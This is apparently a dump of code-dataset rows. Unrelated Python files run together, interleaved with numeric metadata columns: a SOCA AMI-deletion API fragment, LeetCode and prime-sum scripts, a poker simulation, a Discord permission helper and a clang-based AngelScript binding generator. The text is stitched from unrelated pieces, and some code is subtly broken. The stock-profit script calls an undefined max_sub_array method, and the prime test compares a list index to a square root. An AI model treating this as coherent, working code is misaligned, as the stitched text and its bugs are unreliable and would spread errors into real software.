return errors.all_errors('IMAGE_REGISTER_ERROR', f"{ami_id} Couldn't locate {ami_id} in AWS account. Make sure you do have permission to view it")
else:
logger.error(f"Label already in use {ami_label}")
return errors.all_errors('IMAGE_REGISTER_ERROR', f"Label {ami_label} already in use. Please enter a unique label")
@admin_api
def delete(self):
"""
Delete an EC2 AMI registered as DCV image on SOCA
---
tags:
- DCV
parameters:
- in: body
name: body
schema:
required:
- ami_label
properties:
ami_label:
type: string
description: Friendly name for your image
responses:
200:
description: Pair of user/token is valid
401:
description: Invalid user/token pair
"""
parser = reqparse.RequestParser()
parser.add_argument('ami_label', type=str, location='form')
args = parser.parse_args()
if args["ami_label"] is None:
return errors.all_errors('CLIENT_MISSING_PARAMETER', "ami_label (str) is required.")
check_session = AmiList.query.filter_by(ami_label=args["ami_label"], is_active=True).first()
if check_session:
check_session.is_active = False
check_session.deactivated_on = datetime.datetime.utcnow()
try:
db.session.commit()
logger.info(f"AMI Label {args['ami_label']} deleted from SOCA")
return {"success": True, "message": f"{args['ami_label']} deleted from SOCA successfully"}, 200
except exc.SQLAlchemyError as e:
db.session.rollback()
logger.error(f"AMI Label {args['ami_label']} delete failed {e}")
return errors.all_errors('IMAGE_DELETE_ERROR', f"{args['ami_label']} could not have been deleted because of {e}")
else:
return errors.all_errors('IMAGE_DELETE_ERROR', f"{args['ami_label']} could not be found")
| 45.655367
| 205
| 0.516891
| 862
| 8,081
| 4.684455
| 0.25522
| 0.059435
| 0.037147
| 0.052006
| 0.418029
| 0.381129
| 0.360079
| 0.324418
| 0.278851
| 0.217434
| 0
| 0.008069
| 0.371241
| 8,081
| 177
| 206
| 45.655367
| 0.786656
| 0.276946
| 0
| 0.211111
| 0
| 0.022222
| 0.272057
| 0.013962
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0
| 0.122222
| 0
| 0.311111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75bb6e08d53656c02653379a24d3bf7833708bba
| 807
|
py
|
Python
|
Day 5/python/main.py
|
BenBMoore/leetcode-challenges
|
97359abbeb24daf8cc33fe2bf1d5748ac824aab4
|
[
"MIT"
] | null | null | null |
Day 5/python/main.py
|
BenBMoore/leetcode-challenges
|
97359abbeb24daf8cc33fe2bf1d5748ac824aab4
|
[
"MIT"
] | null | null | null |
Day 5/python/main.py
|
BenBMoore/leetcode-challenges
|
97359abbeb24daf8cc33fe2bf1d5748ac824aab4
|
[
"MIT"
] | null | null | null |
import argparse
from typing import List
class Solution:
def max_profit(self, prices: List[int]) -> int:
best_profit = 0
for idx in range(0, len(prices) - 1):
# If the price is not greater, then "sell at the peak", else buy/hold
if prices[idx + 1] > prices[idx]:
best_profit += prices[idx + 1] - prices[idx]
return best_profit
def main():
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='An integer for processing by the happy number process')
args = parser.parse_args()
number = args.integers
max_sum = Solution().max_sub_array(number)
print(max_sum)
if __name__ == "__main__":
main()
| 27.827586
| 85
| 0.619579
| 106
| 807
| 4.54717
| 0.584906
| 0.074689
| 0.041494
| 0.06639
| 0.078838
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00846
| 0.267658
| 807
| 28
| 86
| 28.821429
| 0.807107
| 0.083024
| 0
| 0
| 0
| 0
| 0.126016
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.105263
| 0
| 0.315789
| 0.052632
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75bdd147dbc8647c0747f11af9d4431656daa233
| 947
|
py
|
Python
|
ex2.py
|
timwuu/AnaPoker
|
7cb125c4639a5cd557a6b45c92b5793dcc39def8
|
[
"MIT"
] | null | null | null |
ex2.py
|
timwuu/AnaPoker
|
7cb125c4639a5cd557a6b45c92b5793dcc39def8
|
[
"MIT"
] | null | null | null |
ex2.py
|
timwuu/AnaPoker
|
7cb125c4639a5cd557a6b45c92b5793dcc39def8
|
[
"MIT"
] | null | null | null |
import calcWinRate as cwr
def pp( a, b, table, k):
result = cwr.calc_win_rate( a, b, table, k)
print( "{} vs {} with {}".format( cwr.card_lst(a), cwr.card_lst(b), cwr.card_lst(table)))
print( "{:2.2%} vs {:2.2%}\n".format(result[0], result[1]))
k= 10000 # simulate k times
# --- example 0 ---
# --- 1-draw straight vs 4-card flush
player_a = [51,43] #AQ
player_b = [52,48] #AKs
table_cards = [47,40,28] #K,J,8
pp( player_a, player_b, table_cards, k)
# --- straight vs 4-card flush
player_a = [51,43] #AQ
player_b = [52,48] #AKs
table_cards = [47,40,28,33] #K,J,8,T
pp( player_a, player_b, table_cards, k)
# --- straight vs three of kind
player_a = [51,43] #AQ
player_b = [47,46] #KK
table_cards = [48,40,26,33] #K,J,8,T
pp( player_a, player_b, table_cards, k)
# --- straight vs two pairs
player_a = [51,43] #AQ
player_b = [47,39] #KJs
table_cards = [48,40,26,33] #K,J,8,T
pp( player_a, player_b, table_cards, k)
| 22.023256
| 93
| 0.62302
| 185
| 947
| 3.032432
| 0.308108
| 0.099822
| 0.064171
| 0.078431
| 0.620321
| 0.620321
| 0.620321
| 0.620321
| 0.541889
| 0.541889
| 0
| 0.104381
| 0.18057
| 947
| 42
| 94
| 22.547619
| 0.618557
| 0.211193
| 0
| 0.545455
| 0
| 0
| 0.049451
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.045455
| 0
| 0.090909
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75bf78052e28e2d4673d9f69709a11b7958bfff3
| 1,085
|
py
|
Python
|
Utils/Permission.py
|
koi312500/Koi_Bot_Discord
|
9d7a70f42cdb1110e6382125ade39d3aec21b3b9
|
[
"MIT"
] | null | null | null |
Utils/Permission.py
|
koi312500/Koi_Bot_Discord
|
9d7a70f42cdb1110e6382125ade39d3aec21b3b9
|
[
"MIT"
] | 1
|
2021-06-23T01:16:36.000Z
|
2021-06-23T01:16:36.000Z
|
Utils/Permission.py
|
koi312500/Koi_Bot_Discord
|
9d7a70f42cdb1110e6382125ade39d3aec21b3b9
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands
from Utils.UserClass import UserClass as User
permission_message = ["Guest [Permission Level : 0]", "User [Permission Level : 1]", "Developer [Permission Level : 2]", "Owner [Permission Level : 3]"]
async def check_permission(ctx, level):
now_user = User(ctx.author)
if now_user.permission >= level:
return False
else:
embed = discord.Embed(title=f"User Permission Error", color=0xff0000)
embed.set_footer(text = "Sented by Koi_Bot#4999ㆍUser Permission Error")
if now_user.permission == 0 and level == 1:
embed.add_field(name = "Suggestion", value = "/accept_term으로 약관 동의를 하시면, 'User [Permission Level : 1]' 권한을 얻어, 이 명령어를 실행 하실 수 있습니다.", inline = False)
embed.add_field(name = "Your Permission", value = f"{str(permission_message[int(now_user.permission)])}", inline = True)
embed.add_field(name = "Command Executable Permission", value = f"{str(permission_message[int(level)])}", inline = True)
await ctx.respond(embed=embed)
return True
| 57.105263
| 161
| 0.682028
| 145
| 1,085
| 5.006897
| 0.489655
| 0.134986
| 0.078512
| 0.070248
| 0.107438
| 0.107438
| 0.107438
| 0
| 0
| 0
| 0
| 0.018412
| 0.199078
| 1,085
| 19
| 162
| 57.105263
| 0.817031
| 0
| 0
| 0
| 0
| 0.058824
| 0.37477
| 0.081031
| 0
| 0
| 0.007366
| 0
| 0
| 1
| 0
| false
| 0
| 0.176471
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75bfcbaef981a9d2b8f3eecff56d9741a7a40637
| 436
|
py
|
Python
|
10.py
|
seanmanson/euler
|
b01418cf44c1113a0c574b5158aa5b89d725cca2
|
[
"MIT"
] | null | null | null |
10.py
|
seanmanson/euler
|
b01418cf44c1113a0c574b5158aa5b89d725cca2
|
[
"MIT"
] | null | null | null |
10.py
|
seanmanson/euler
|
b01418cf44c1113a0c574b5158aa5b89d725cca2
|
[
"MIT"
] | null | null | null |
import math
test = []
def testPrime(num):
sq = int(math.sqrt(num))
for i, factor in enumerate(test):
if (i > sq):
break
if (num % factor == 0):
return False
test.append(num)
return True
sumPrimes = 2
for i in range(3, 2000000, 2):
if not testPrime(i):
continue
sumPrimes+=i
if (i % 10000 == 1):
print("progress : ", i, sumPrimes)
print (sumPrimes)
| 18.166667
| 42
| 0.538991
| 58
| 436
| 4.051724
| 0.551724
| 0.034043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058621
| 0.334862
| 436
| 23
| 43
| 18.956522
| 0.751724
| 0
| 0
| 0
| 0
| 0
| 0.025229
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.052632
| 0
| 0.210526
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75c33edb1fb71d6cd1c893b5ce0674035ed9e6dd
| 37,403
|
py
|
Python
|
clangelscript.py
|
gwihlidal/Clangelscript
|
e83f77d78bf57c25f67922b65aad2f8e74ce2699
|
[
"MIT"
] | 1
|
2019-06-21T06:37:16.000Z
|
2019-06-21T06:37:16.000Z
|
clangelscript.py
|
gwihlidal/clangelscript
|
e83f77d78bf57c25f67922b65aad2f8e74ce2699
|
[
"MIT"
] | null | null | null |
clangelscript.py
|
gwihlidal/clangelscript
|
e83f77d78bf57c25f67922b65aad2f8e74ce2699
|
[
"MIT"
] | null | null | null |
import sys
import re
import json
import os.path
import copy
from mako.template import Template
from clang import cindex
configfile = "clangelscript.json"
f = open(configfile)
data = f.read()
data = re.sub(r"//[^n]*n", "\n", data)
config = json.loads(data)
f.close()
if "ObjectTypes" in config:
arr = config["ObjectTypes"]
config["ObjectTypes"] = {}
for name in arr:
config["ObjectTypes"][re.compile(name)] = arr[name]
def get(name, default=None, conf=config):
if name in conf:
return conf[name]
else:
return default
fir = get("FileIncludeRegex", None)
fer = get("FileExcludeRegex", None)
mir = get("MethodIncludeRegex", None)
mer = get("MethodExcludeRegex", None)
oir = get("ObjectIncludeRegex", None)
oer = get("ObjectExcludeRegex", None)
mfir = get("FieldIncludeRegex", None)
mfer = get("FieldExcludeRegex", None)
generic_regex = get("GenericWrapperRegex", None)
maahr = get("MethodArgumentAutoHandleRegex", None)
mrahr = get("MethodReturnAutoHandleRegex", None)
fir = re.compile(fir) if fir else fir
fer = re.compile(fer) if fer else fer
mir = re.compile(mir) if mir else mir
mer = re.compile(mer) if mer else mer
oir = re.compile(oir) if oir else oir
oer = re.compile(oer) if oer else oer
mfir = re.compile(mfir) if mfir else mfir
mfer = re.compile(mfer) if mfer else mfer
maahr = re.compile(maahr) if maahr else maahr
mrahr = re.compile(mrahr) if mrahr else mrahr
generic_regex = re.compile(generic_regex) if generic_regex else generic_regex
verbose = get("Verbose", False)
doassert = get("Assert", True)
keep_unknowns = get("KeepUnknowns", False)
output_filename = get("OutputFile", None)
funcname = get("FunctionName", "registerScripting")
generic_wrappers = []
index = cindex.Index.create()
clang_args = get("ClangArguments", [])
#clang_args.insert(0, "-I%s/clang/include" % os.path.dirname(os.path.abspath(__file__)))
new_args = []
for arg in clang_args:
new_args.append(arg.replace("${ConfigFilePath}", os.path.dirname(os.path.abspath(configfile))))
clang_args = new_args
tu = index.parse(None, clang_args, [], 13)
warn_count = 0
def logWarning(msg):
global warn_count
warn_count += 1
if verbose:
sys.stderr.write(msg + "\n")
def get_type(type, cursor=None):
pointer = type.kind == cindex.TypeKind.POINTER
typename = ""
ref = type.kind == cindex.TypeKind.LVALUEREFERENCE
if type.kind == cindex.TypeKind.TYPEDEF or type.kind == cindex.TypeKind.RECORD or type.kind == cindex.TypeKind.ENUM:
typename = type.get_declaration()
elif pointer or ref:
t2 = type.get_pointee()
typename = t2.get_declaration()
if typename is None or typename.kind.is_invalid():
typename = get_type(t2)
elif type.kind == cindex.TypeKind.ULONG:
typename = "unsigned long"
elif type.kind == cindex.TypeKind.UINT:
typename = "unsigned int"
elif type.kind == cindex.TypeKind.USHORT:
typename = "unsigned short"
elif type.kind == cindex.TypeKind.CONSTANTARRAY:
if cursor is None:
raise Exception("Constant array, but cursor not provided so can't solve the type")
typename = get_type(type.get_array_element_type())
else:
typename = type.kind.name.lower()
if typename is None:
raise Exception("Typename was None %s" % type.kind)
elif isinstance(typename, cindex.Cursor):
if typename.spelling == None:
raise Exception("Typename was None %s" % type.kind)
fullname = [typename.spelling]
cursor = typename.lexical_parent
while not cursor is None and (cursor.kind == cindex.CursorKind.NAMESPACE or cursor.kind == cindex.CursorKind.CLASS_DECL):
fullname.insert(0, cursor.displayname)
cursor = cursor.lexical_parent
typename = "::".join(fullname)
elif typename == "unexposed":
raise Exception("Typename is unexposed")
return "%s%s" % (typename, "*" if pointer else "&" if ref else "")
def is_int(literal):
try:
i = int(literal)
return True
except:
try:
i = int(literal, 16)
return True
except:
pass
return False
objecttype_scoreboard = {}
def add_use(typename):
val = (0, 0)
p = 0
if "*" in typename:
p = 1
typename = typename[:-1]
if typename in objecttype_scoreboard:
val = objecttype_scoreboard[typename]
objecttype_scoreboard[typename] = (val[0]+p, val[1]+1-p)
typedef = {}
def get_real_type(name):
ptr = "*" in name
ref = "&" in name
if ptr or ref:
name = name[:-1]
while name in typedef:
name = typedef[name]
if ptr:
return name + "*"
if ref:
return name + "&"
return name
def is_const(cursor):
#tokens = cindex.tokenize(tu, cursor.extent)
tokens = list(cindex.TokenGroup.get_tokens(tu, cursor.extent))
for token in tokens:
if token.spelling == "const":
return True
return False
as_builtins = {
"unsigned long": "uint64",
"unsigned int": "uint",
"unsigned short": "uint16",
"unsigned char": "uint8",
"long": "int64",
"void": "void",
"double": "double",
"float": "float",
"char": "int8",
"short": "int16",
"int": "int",
"long": "int64",
"bool": "bool"
}
def get_as_type(name):
ptr = "*" in name
ref = "&" in name
name = name.replace("*", "").replace("&", "")
if name in as_builtins:
if ptr:
raise Exception("Built-in value type %s used as a reference type" % (as_builtins[name]))
name = as_builtins[name]
return "%s%s%s" % (name, "@" if ptr else "", "&" if ref else "")
class Type:
def __init__(self, kind):
typename = get_type(kind)
self.cname = typename
typename = get_real_type(typename)
self.resolved = typename
add_use(typename)
self.const = kind.is_const_qualified()
get_as_type(self.resolved)
def __repr__(self):
return self.cname
def get_as_type(self):
as_type = None
if "ObjectTypes" in config:
for regex in config["ObjectTypes"]:
if regex.search(self.cname) != None:
conf = config["ObjectTypes"][regex]
if "AngelScriptType" in conf:
as_type = regex.sub(conf["AngelScriptType"], self.cname)
break
if as_type == None:
as_type = get_as_type(self.resolved)
return "%s%s" % ("const " if self.const else "", as_type)
def is_known(self):
name = self.resolved.replace("*", "").replace("&", "")
if name in objecttypes:
return True
if name in as_builtins:
return True
if "ObjectTypes" in config:
for regex in config["ObjectTypes"]:
if regex.search(self.cname) != None:
return True
return False
def get_c_type(self):
return "%s%s" % ("const " if self.const else "", self.cname)
def is_reference_type(name):
if "ObjectTypes" in config:
for regex in config["ObjectTypes"]:
if regex.search(name) and "Reference" in config["ObjectTypes"][regex]:
return config["ObjectTypes"][regex]["Reference"]
if name in objecttypes:
ot = objecttypes[name]
for p in ot.parents:
v = is_reference_type(p)
if not v is None:
return v
if name in objecttype_scoreboard:
score = objecttype_scoreboard[name]
return score[0] > score[1]
return None
operatornamedict = {
"-operator": "opNeg",
"~operator": "opCom",
"++operator": "opPreInc",
"--operator": "opPreDec",
"operator==": "opEquals",
#"operator!=": "opEquals",
"operator<": "opCmp",
# "operator<=": "opCmp",
# "operator>": "opCmp",
# "operator>=": "opCmp",
"operator++": "opPostInc",
"operator--": "opPostDec",
"operator+": "opAdd",
"operator-": "opSub",
"operator*": "opMul",
"operator/": "opDiv",
"operator%": "opMod",
"operator&": "opAnd",
"operator|": "opOr",
"operator^": "opXor",
"operator<<": "opShl",
"operator>>": "opShr",
"operator>>>": "opUShr",
"operator[]": "opIndex",
"operator=": "opAssign",
"operator+=": "opAddAssign",
"operator-=": "opSubAssign",
"operator*=": "opMulAssign",
"operator/=": "opDivAssign",
"operator%=": "opModAssign",
"operator&=": "opAndAssign",
"operator|=": "opOrAssign",
"operator^=": "opXorAssign",
"operator<<=": "opShlAssign",
"operator>>=": "opShrAssign",
"operator>>>=": "opUShrAssign",
}
class Function(object):
def __init__(self, cursor, clazz=None, behaviour=None):
self.args = []
if cursor is None:
return
children = list(cursor.get_children())
for child in children:
if child.kind == cindex.CursorKind.PARM_DECL:
t = Type(child.type)
t.const = is_const(child)
self.args.append(t)
self.name = cursor.spelling
self.return_type = Type(cursor.result_type)
self.clazz = clazz
self.const = False
self.behaviour = behaviour
if self.clazz and not behaviour:
start = cursor.extent.start
end = cursor.extent.end
i = 0
while i < len(children):
if children[i].kind == cindex.CursorKind.PARM_DECL:
start = children[i].extent.end
if children[i].kind == cindex.CursorKind.COMPOUND_STMT:
if i > 0:
start = children[i-1].extent.end
end = children[i].extent.start
break
i += 1
if i == len(children):
break
start = children[i-1].extent.end
r = cindex.SourceRange.from_locations(start, end)
f = open(cursor.location.file.name)
f.seek(start.offset)
length = end.offset-start.offset
data = f.read(length)
f.close()
self.const = re.search(r"\s*const\s*(=\s*0)?$", data) != None
if len(children) > 0 and children[0].kind != cindex.CursorKind.PARM_DECL:
f = open(cursor.location.file.name)
f.seek(cursor.extent.start.offset)
length = children[0].extent.start.offset-cursor.extent.start.offset
data = f.read(length)
f.close()
data = re.sub(r"%s.*" % self.name, "", data)
self.return_type.const = re.search(r"\s*const\s*$", data) != None
self.asname()
if mir or mer:
pn = self.pretty_name()
if mer and mer.search(pn):
raise Exception("Function matches exclusion pattern. %s" % pn)
if mir and not mir.search(pn):
raise Exception("Function does not match inclusion pattern. %s" % pn)
def uses(self, typename):
if self.return_type.resolved == typename:
return True
for t in self.args:
if t.resolved == typename:
return True
return False
def pretty_name(self):
cargs = ", ".join([t.get_c_type() for t in self.args])
if self.clazz:
return "%s %s::%s(%s)" % (self.return_type, self.clazz, self.name, cargs)
else:
return "%s %s(%s)" % (self.return_type, self.name, cargs)
def asname(self):
name = self.name
if "operator" in name:
if name not in operatornamedict:
raise Exception("Operator not supported in AngelScript %s" % self.pretty_name())
name = operatornamedict[name]
asargs = []
auto_handle_args = False
auto_handle_return = False
if maahr and maahr.search(self.pretty_name()) != None:
auto_handle_args = True
if mrahr and mrahr.search(self.pretty_name()) != None:
auto_handle_return = True
for a in self.args:
asname = a.get_as_type()
ref = "&" in asname
if ref:
asname2 = get_as_type(a.resolved)[:-1]
extra = ""
if not is_reference_type(asname2):
# Value types can only be in or out references. Defaulting to in
asname += "in"
if "@" in asname and auto_handle_args:
asname2 = asname[:-1]
add = True
if asname2 in objecttypes:
ot = objecttypes[asname2]
if "asOBJ_NOCOUNT" in ot.get_flags():
add = False
if add:
asname += "+"
asargs.append(asname)
asargs = ", ".join(asargs)
if self.behaviour == "asBEHAVE_CONSTRUCT" or self.behaviour == "asBEHAVE_FACTORY":
name = "void f(%s)" % (asargs)
if is_reference_type(self.clazz):
add = auto_handle_return
if self.clazz in objecttypes:
ot = objecttypes[self.clazz]
if "asOBJ_NOCOUNT" in ot.get_flags():
add = False
name = "%s@%s %s(%s)" % (self.clazz, "+" if add else "", self.clazz, asargs)
self.behaviour = "asBEHAVE_FACTORY"
elif self.behaviour == "asBEHAVE_DESTRUCT":
name = "void f()"
else:
asname = self.return_type.get_as_type()
if "@" in asname and auto_handle_return:
asname2 = asname[:-1]
add = True
if asname2 in objecttypes:
ot = objecttypes[asname2]
if "asOBJ_NOCOUNT" in ot.get_flags():
add = False
if add:
asname += "+"
name = "%s %s(%s)" % (asname, name, asargs)
if self.clazz and self.const:
name += " const"
return name
def get_generic(self):
lut = {
"double": "Double",
"float": "Float",
"uint": "DWord",
"int": "DWord",
"uint16": "Word",
"int16": "Word",
"uint8": "Byte",
"int8": "Byte",
"bool": "Byte"
}
name = self.name
if "operator" in name:
name = operatornamedict[name]
name = name.replace("~", "tilde") + "_generic"
for arg in self.args:
name += "_" + arg.get_c_type().replace("&", "amp").replace("*", "star").replace(" ", "space").replace(":", "colon")
if self.clazz:
name = self.clazz + "_" + name
func = "void %s(asIScriptGeneric *gen)\n{\n" % name
asret = self.return_type.get_as_type()
call = "%s(" % self.name
if self.clazz:
if is_reference_type(self.clazz) and self.behaviour == "asBEHAVE_CONSTRUCT":
self.behaviour = "asBEHAVE_FACTORY"
if self.behaviour == "asBEHAVE_FACTORY":
call = "gen->SetReturnAddress(new %s(" % (self.name)
elif self.behaviour == "asBEHAVE_CONSTRUCT":
call = "new(gen->GetObject()) %s(" % self.name
else:
call = "static_cast<%s*>(gen->GetObject())->%s" % (self.clazz, call)
for i in range(len(self.args)):
if i > 0:
call += ", "
arg = self.args[i]
t = arg.get_as_type()
if t in lut:
call += "gen->GetArg%s(%d)" % (lut[t], i)
else:
ct = arg.get_c_type()
pt = "*" in ct
star = "*" if not pt else ""
if "&" in ct:
call += "%sstatic_cast<%s%s>(gen->GetArgAddress(%d))" % (star, arg.get_c_type().replace("&", ""), star, i)
else:
call += "%sstatic_cast<%s%s>(gen->GetArgObject(%d))" % (star, arg.get_c_type(), star, i)
call += ")"
if self.behaviour == "asBEHAVE_FACTORY":
call += ")"
asret2 = asret.replace("const ", "").strip()
if asret2 in lut:
func += "\tgen->SetReturn%s(%s);\n" % (lut[asret2], call)
elif asret == "void":
func += "\t" + call + ";\n"
else:
ct = self.return_type.get_c_type()
pt = "*" in ct
star = "*" if not pt else ""
if pt:
func += "\tgen->SetReturnAddress(%s);\n" % (call)
elif "&" in ct:
func += "\tgen->SetReturnAddress((void*)&%s);\n" % (call)
else:
func += "\t" + self.return_type.get_c_type().replace("&", "").replace("const ", "") + " ret = %s;\n" % call
func += "\tgen->SetReturnObject(&ret);\n"
#func += "\t" + self.return_type.get_c_type() + " ret = %s;\n" % call
#func += "\tnew(gen->GetAddressOfReturnLocation()) %s(ret);\n" % self.return_type.get_c_type().replace("&", "")
func += "}\n"
if func not in generic_wrappers:
generic_wrappers.append(func)
return "asFUNCTION(%s), asCALL_GENERIC" % (name)
def get_register_string(self):
global generic_wrappers
cargs = ", ".join([at.get_c_type() for at in self.args])
if self.clazz == None:
callconv = "asCALL_CDECL"
call = "asFUNCTIONPR(%s, (%s), %s), %s" % (self.name, cargs, self.return_type.get_c_type(), callconv)
if generic_regex and generic_regex.search(self.pretty_name()):
call = self.get_generic()
return _assert("engine->RegisterGlobalFunction(\"%s\", %s)" % (self.asname(), call))
else:
const = " const" if self.const else ""
call = "asMETHODPR(%s, %s, (%s)%s, %s), asCALL_THISCALL" % (self.clazz, self.name, cargs, const, self.return_type.get_c_type())
if (generic_regex and generic_regex.search(self.pretty_name())) or \
self.behaviour == "asBEHAVE_CONSTRUCT" or \
self.behaviour == "asBEHAVE_DESTRUCT" or \
self.behaviour == "asBEHAVE_FACTORY":
call = self.get_generic()
if self.behaviour == None:
return _assert("engine->RegisterObjectMethod(\"%s\", \"%s\", %s)" % (self.clazz, self.asname(), call))
else:
name = self.asname()
return _assert("engine->RegisterObjectBehaviour(\"%s\", %s, \"%s\", %s)" % (self.clazz, self.behaviour, name, call))
def is_pure_virtual(cursor):
# TODO: Use iterator here
children = list(cursor.get_children())
start = cursor.extent.start
end = cursor.extent.end
while len(children) != 0:
child = children[-1]
children = list(child.get_children())
start = child.extent.end
f = open(cursor.location.file.name)
f.seek(start.offset)
length = end.offset-start.offset
data = f.read(length)
f.close()
return re.search(r"=\s*0\s*$", data) != None
objectindex = 0
class ObjectType:
def add_field(self, children, array):
for child in children:
if child.kind == cindex.CursorKind.CXX_BASE_SPECIFIER:
self.add_fields(child.get_reference().get_children(), array)
if child.kind == cindex.CursorKind.FIELD_DECL:
array.append(child)
def __init__(self, cursor, children, name):
global objectindex
self.cursor = cursor
self.name = name
self.flags = {"asOBJ_APP_CLASS": True}
fields = []
self.parents = []
self.index = objectindex
objectindex += 1
self.has_pure_virtuals = False
access = cindex.AccessSpecifier.PRIVATE if cursor.kind == cindex.CursorKind.CLASS_DECL else cindex.AccessSpecifier.PUBLIC
idx = access.from_param;
for child in children:
if child.kind == cindex.CursorKind.CXX_BASE_SPECIFIER:
c = child.get_resolved_cursor()
parentname = c.spelling
if parentname in objecttypes:
ot = objecttypes[parentname]
self.parents.extend(ot.parents)
self.parents.append(parentname)
toadd = []
for om in objectmethods:
if om.clazz == parentname:
f = copy.deepcopy(om)
f.clazz = self.name
toadd.append(f)
objectmethods.extend(toadd)
toadd = []
for of in objectfields:
if of.clazz == parentname:
f = copy.deepcopy(of)
f.clazz = self.name
toadd.append(f)
objectfields.extend(toadd)
continue
if child.kind == cindex.CursorKind.CXX_ACCESS_SPEC_DECL:
access = child.access_specifier
continue
if not access == cindex.AccessSpecifier.PUBLIC:
continue
if child.kind == cindex.CursorKind.CXX_METHOD:
if child.spelling == "operator=":
self.flags["asOBJ_APP_CLASS_ASSIGNMENT"] = True
if child.is_static_method():
# TODO
logWarning("Skipping member method %s::%s as it's static" % (self.name, child.spelling))
continue
try:
objectmethods.append(Function(child, self.name))
except Exception as e:
logWarning("Skipping member method %s::%s - %s" % (self.name, child.spelling, e))
if is_pure_virtual(child):
self.has_pure_virtuals = True
elif child.kind == cindex.CursorKind.CONSTRUCTOR:
self.flags["asOBJ_APP_CLASS_CONSTRUCTOR"] = True
try:
f = Function(child, self.name, "asBEHAVE_CONSTRUCT")
behaviours.append(f)
except Exception as e:
logWarning("Skipping constructor %s::%s - %s" % (self.name, child.spelling, e))
elif child.kind == cindex.CursorKind.DESTRUCTOR:
self.flags["asOBJ_APP_CLASS_DESTRUCTOR"] = True
try:
f = Function(child, self.name, "asBEHAVE_DESTRUCT")
behaviours.append(f)
except Exception as e:
logWarning("Skipping destructor %s::%s - %s" % (self.name, child.spelling, e))
elif child.kind == cindex.CursorKind.FIELD_DECL:
try:
type = Type(child.type)
objectfields.append(ObjectField(self.name, child.spelling, type))
except Exception as e:
logWarning("Skipping member field %s::%s - %s" % (self.name, child.spelling, e))
elif child.kind == cindex.CursorKind.TYPEDEF_DECL:
name, kind = get_typedef(child)
if name:
typedef[name] = kind
logWarning("Typedefs within classes are not supported by AngelScript")
else:
logWarning("Unhandled cursor: %s, %s" % (child.displayname, child.kind))
if "asOBJ_APP_CLASS_DESTRUCTOR" not in self.flags:
self.flags["asOBJ_POD"] = True
self.add_field(children, fields)
if len(fields):
try:
child = fields.pop(0)
t = get_real_type(get_type(child.type, child))
allEqual = True
for field in fields:
t2 = get_real_type(get_type(field.type, field))
if t2 != t:
break
if allEqual:
if t == "float":
self.flags["asOBJ_APP_CLASS_ALLFLOATS"] = True
elif t == "int" or t == "unsigned int":
self.flags["asOBJ_APP_CLASS_ALLINTS"] = True
else:
logWarning("%s does not have all fields of equal type. Trying ALLINTS anyway" % (self.name, t))
self.flags["asOBJ_APP_CLASS_ALLINTS"] = True
except:
pass
def get_flags(self):
flags = [] if is_reference_type(self.name) else list(self.flags)
if "ObjectTypes" in config:
for regex in config["ObjectTypes"]:
if regex.search(self.name):
conf = config["ObjectTypes"][regex]
if "Flags" in conf:
flags = conf["Flags"]
if "ExtraFlags" in conf:
flags.extend(conf["ExtraFlags"])
if not is_reference_type(self.name):
if "asOBJ_NOCOUNT" in flags:
flags.remove("asOBJ_NOCOUNT")
return flags
def get_register_string(self):
flags = self.get_flags()
f = "%s%s%s" % ("asOBJ_REF" if is_reference_type(self.name) else "asOBJ_VALUE", "|" if len(flags) else "", "|".join(flags))
if not is_reference_type(self.name):
return _assert("engine->RegisterObjectType(\"%s\", sizeof(%s), %s)" % (self.name, self.name, f))
ret = _assert("engine->RegisterObjectType(\"%s\", 0, %s)" % (self.name, f))
for parent in self.parents:
extra = "_nocount" if "asOBJ_NOCOUNT" in flags else ""
ret += "\n\t" + _assert("engine->RegisterObjectBehaviour(\"%s\", asBEHAVE_REF_CAST, \"%s@ f()\", asFUNCTION((refCast%s<%s,%s>)), asCALL_CDECL_OBJLAST)" % (parent, self.name, extra, parent, self.name))
ret += "\n\t" + _assert("engine->RegisterObjectBehaviour(\"%s\", asBEHAVE_IMPLICIT_REF_CAST, \"%s@ f()\", asFUNCTION((refCast%s<%s,%s>)), asCALL_CDECL_OBJLAST)" % (self.name, parent, extra, self.name, parent))
if not "asOBJ_NOCOUNT" in flags:
f = Function(None)
f.name = "AddRef"
f.clazz = self.name
f.const = False
